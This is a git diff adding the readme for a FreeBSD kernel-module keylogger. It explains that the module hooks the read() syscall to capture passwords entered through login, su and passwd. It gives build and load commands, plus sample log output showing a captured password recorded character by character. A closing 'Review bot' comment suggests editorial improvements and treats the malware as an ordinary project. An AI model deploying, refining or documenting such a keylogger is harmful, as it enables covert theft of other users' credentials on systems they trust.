added keylogger
48
keylog/readme.txt
Normal file
@@ -0,0 +1,48 @@
|
||||
keylog readme
|
||||
=============
|
||||
|
||||
this module reads passwords entered via:
|
||||
- login
|
||||
- su
|
||||
- passwd
|
||||
|
||||
and all other services using read() syscall.
|
||||
tested on FreeBSD 9.3, should also run on 10.1 and others.
|
||||
|
||||
usage
|
||||
=====
|
||||
FreeBSD fbsd_default 9.3-RELEASE FreeBSD 9.3-RELEASE #0 r268512: Fri Jul 11 03:13:02 UTC 2014 root@snap.freebsd.org:/usr/obj/usr/src/sys/GENERIC i386
|
||||
|
||||
# make
|
||||
# kldload ./keylog.ko
|
||||
# kldstat
|
||||
Id Refs Address Size Name
|
||||
1 3 0xc0400000 1289f7c kernel
|
||||
2 1 0xc49ad000 2000 keylog.ko
|
||||
|
||||
|
||||
# ls -al /.keylog.txt
|
||||
-rw-r--r-- 1 root wheel 809 Jun 2 22:59 /.keylog.txt
|
||||
|
||||
(10)
|
||||
[1915]:p(112)
|
||||
[1915]:a(97)
|
||||
[1915]:s(115)
|
||||
[1915]:s(115)
|
||||
[1915]:w(119)
|
||||
[1915]:o(111)
|
||||
[1915]:r(114)
|
||||
[1915]:d(100)
|
||||
[1915]:
|
||||
(10)
|
||||
|
||||
The logfile is organized as follows: [pid]:character(character as decimal value). In this case you can see
|
||||
that the entered password, called due the login binary with process id 1915 is: 'password'.
|
||||
|
||||
If you want to change the path, go into the sourcecode and look for the variable LOGPATH.
|
||||
|
||||
Warning. Unloading the module seams to leave the kernel in a unstable state, so do not unload it ;)
|
||||
|
||||
Author
|
||||
------
|
||||
dash
|
||||
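Review bot: The unload warning near the end of the readme ("Unloading the module seams to leave the kernel in a unstable state") gives no cause and no way back to a clean system; say what state is left behind and what the operator of the test host has to do to recover, rather than only "do not unload it". The usage section also shows /.keylog.txt created as -rw-r--r-- root wheel, so every captured password is readable by any local account, and the readme should state that exposure and the cleanup of the file. "should also run on 10.1 and others" is an untested claim next to a single tested release (9.3 i386) and should be marked as such. Wording: "seams" should be "seems", "a unstable" should be "an unstable", and "called due the login binary" reads as "entered via the login binary".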